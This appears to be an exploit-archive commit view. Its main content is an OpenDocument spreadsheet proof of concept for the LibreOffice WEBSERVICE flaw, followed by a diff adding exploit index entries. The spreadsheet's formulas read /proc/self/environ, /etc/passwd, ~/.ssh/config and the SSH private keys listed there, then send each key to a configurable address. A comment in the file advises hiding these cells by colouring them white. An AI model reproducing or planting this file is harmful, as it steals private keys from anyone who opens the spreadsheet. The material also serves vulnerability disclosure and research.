<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:presentation="urn:oasis:names:tc:opendocument:xmlns:presentation:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
<office:automatic-styles>
<style:style style:name="co1" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="73.3pt"/>
</style:style>
<style:style style:name="co2" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="75.66pt"/>
</style:style>
<style:style style:name="co3" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="173.14pt"/>
</style:style>
<style:style style:name="co4" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="64.01pt"/>
</style:style>
<style:style style:name="co5" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="420.94pt"/>
</style:style>
<style:style style:name="co6" style:family="table-column">
<style:table-column-properties fo:break-before="auto" style:column-width="105.19pt"/>
</style:style>
<style:style style:name="ro1" style:family="table-row">
<style:table-row-properties style:row-height="12.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
</style:style>
<style:style style:name="ro2" style:family="table-row">
<style:table-row-properties style:row-height="126.74pt" fo:break-before="auto" style:use-optimal-row-height="false"/>
</style:style>
<style:style style:name="ro3" style:family="table-row">
<style:table-row-properties style:row-height="135.81pt" fo:break-before="auto" style:use-optimal-row-height="true"/>
</style:style>
<style:style style:name="ta1" style:family="table" style:master-page-name="Default">
<style:table-properties table:display="true" style:writing-mode="lr-tb"/>
</style:style>
<style:style style:name="ce1" style:family="table-cell" style:parent-style-name="Default" style:data-style-name="N0"/>
<style:style style:name="ce2" style:family="table-cell" style:parent-style-name="Default">
<style:text-properties style:use-window-font-color="true"/>
</style:style>
<style:style style:name="ce5" style:family="table-cell" style:parent-style-name="Default">
<style:table-cell-properties fo:background-color="#f3715a"/>
</style:style>
<style:page-layout style:name="pm1">
<style:page-layout-properties style:writing-mode="lr-tb"/>
<style:header-style>
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt"/>
</style:header-style>
<style:footer-style>
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt"/>
</style:footer-style>
</style:page-layout>
<style:page-layout style:name="pm2">
<style:page-layout-properties style:writing-mode="lr-tb"/>
<style:header-style>
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-bottom="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
<style:background-image/>
</style:header-footer-properties>
</style:header-style>
<style:footer-style>
<style:header-footer-properties fo:min-height="21.26pt" fo:margin-left="0pt" fo:margin-right="0pt" fo:margin-top="7.09pt" fo:border="2.49pt solid #000000" fo:padding="0.51pt" fo:background-color="#c0c0c0">
<style:background-image/>
</style:header-footer-properties>
</style:footer-style>
</style:page-layout>
</office:automatic-styles>
<office:body>
<office:spreadsheet>
<table:calculation-settings table:automatic-find-labels="false" table:use-regular-expressions="false" table:use-wildcards="true"/>
<table:table table:name="Sheet1" table:style-name="ta1">
<table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co5" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co4" table:number-columns-repeated="2" table:default-cell-style-name="Default"/>
<table:table-column table:style-name="co6" table:default-cell-style-name="Default"/>
<table:table-row table:style-name="ro1">
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="8"/>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell table:number-columns-repeated="9"/>
</table:table-row>
<table:table-row table:style-name="ro2">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Current user:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1" table:formula="of:="/home/" & MID(COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")) + LEN("USER="); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")))-FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ"))-LEN("USER=")) & "/"" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND(":"; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
<text:p>689</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND("/home"; [.F3]; FIND(":x:1000:1000:"; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
<text:p>676</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE("/etc/passwd")" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
<text:p>http://localhost:8080</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro3">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>List of private keys:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1"/>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & "/.ssh/config"); "~"; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Send:</text:p>
</table:table-cell>
<table:table-cell/>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>0 (default path)</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.C3] & "/.ssh/id_rsa"" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="5"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C5]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="1" calcext:value-type="float">
<text:p>1</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F6])" office:value-type="float" office:value="132" calcext:value-type="float">
<text:p>132</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F6]+LEN("IdentityFile ")" office:value-type="float" office:value="109" calcext:value-type="float">
<text:p>109</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.F4])" office:value-type="float" office:value="96" calcext:value-type="float">
<text:p>96</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C6]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="2" calcext:value-type="float">
<text:p>2</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F7])" office:value-type="float" office:value="297" calcext:value-type="float">
<text:p>297</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F7]+LEN("IdentityFile ")" office:value-type="float" office:value="259" calcext:value-type="float">
<text:p>259</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F6];1))" office:value-type="float" office:value="246" calcext:value-type="float">
<text:p>246</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C7]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="3" calcext:value-type="float">
<text:p>3</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F8])" office:value-type="float" office:value="436" calcext:value-type="float">
<text:p>436</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F8]+LEN("IdentityFile ")" office:value-type="float" office:value="409" calcext:value-type="float">
<text:p>409</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F7];1))" office:value-type="float" office:value="396" calcext:value-type="float">
<text:p>396</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C8]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="4" calcext:value-type="float">
<text:p>4</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F9])" office:value-type="float" office:value="586" calcext:value-type="float">
<text:p>586</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F9]+LEN("IdentityFile ")" office:value-type="float" office:value="563" calcext:value-type="float">
<text:p>563</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F8];1))" office:value-type="float" office:value="550" calcext:value-type="float">
<text:p>550</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C9]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="5" calcext:value-type="float">
<text:p>5</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F10])" office:value-type="float" office:value="718" calcext:value-type="float">
<text:p>718</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F10]+LEN("IdentityFile ")" office:value-type="float" office:value="695" calcext:value-type="float">
<text:p>695</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F9];1))" office:value-type="float" office:value="682" calcext:value-type="float">
<text:p>682</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C10]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="6" calcext:value-type="float">
<text:p>6</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F11])" office:value-type="float" office:value="882" calcext:value-type="float">
<text:p>882</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F11]+LEN("IdentityFile ")" office:value-type="float" office:value="860" calcext:value-type="float">
<text:p>860</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F10];1))" office:value-type="float" office:value="847" calcext:value-type="float">
<text:p>847</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C11]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="7" calcext:value-type="float">
<text:p>7</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F12])" office:value-type="float" office:value="1267" calcext:value-type="float">
<text:p>1267</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F12]+LEN("IdentityFile ")" office:value-type="float" office:value="1240" calcext:value-type="float">
<text:p>1240</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F11];1))" office:value-type="float" office:value="1227" calcext:value-type="float">
<text:p>1227</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C12]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="8" calcext:value-type="float">
<text:p>8</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F13])" office:value-type="float" office:value="1408" calcext:value-type="float">
<text:p>1408</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F13]+LEN("IdentityFile ")" office:value-type="float" office:value="1383" calcext:value-type="float">
<text:p>1383</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F12];1))" office:value-type="float" office:value="1370" calcext:value-type="float">
<text:p>1370</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C13]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro1">
<table:table-cell/>
<table:table-cell office:value-type="float" office:value="9" calcext:value-type="float">
<text:p>9</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p></text:p>
</table:table-cell>
<table:table-cell table:formula="of:=SEARCH(CHAR(10); [.$F$4]; [.F14])" office:value-type="float" office:value="0" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=[.F14]+LEN("IdentityFile ")" office:value-type="float" office:value="0" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:formula="of:=FIND("IdentityFile "; [.$F$4]; SUM([.F13];1))" office:value-type="float" office:value="0" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & "/?q=" & COM.MICROSOFT.WEBSERVICE([.C14]))" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
</table:table-row>
</table:table>
<table:named-expressions/>
</office:spreadsheet>
</office:body>
</office:document>
```

View file

@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port
44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

Can't render this file because it is too large.